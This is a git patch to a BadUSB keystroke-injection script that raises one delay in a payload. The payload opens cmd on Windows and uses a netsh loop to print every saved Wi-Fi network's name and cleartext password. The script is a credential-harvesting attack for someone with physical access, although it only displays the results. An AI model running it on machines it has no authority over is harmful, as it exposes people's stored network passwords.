From 071f161559189c3ec87bd40749afa577a5bb6a84 Mon Sep 17 00:00:00 2001 From: UberGuidoZ <57457139+UberGuidoZ@users.noreply.github.com> Date: Mon, 13 Jun 2022 18:23:33 -0700 Subject: [PATCH] Update Show_WiFi_Passwords.txt --- BadUSB/Show_WiFi_Passwords.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/BadUSB/Show_WiFi_Passwords.txt b/BadUSB/Show_WiFi_Passwords.txt index f32a5441..1c8a5a6a 100644 --- a/BadUSB/Show_WiFi_Passwords.txt +++ b/BadUSB/Show_WiFi_Passwords.txt @@ -3,6 +3,6 @@ GUI r DELAY 1000 STRING cmd ENTER -DELAY 1000 +DELAY 2000 STRING for /f "skip=9 tokens=1,2 delims=:" %i in ('netsh wlan show profiles') do @echo %j | netsh wlan show profiles %j key=clear | findstr /C:"SSID name" /C:"Key Content" ENTER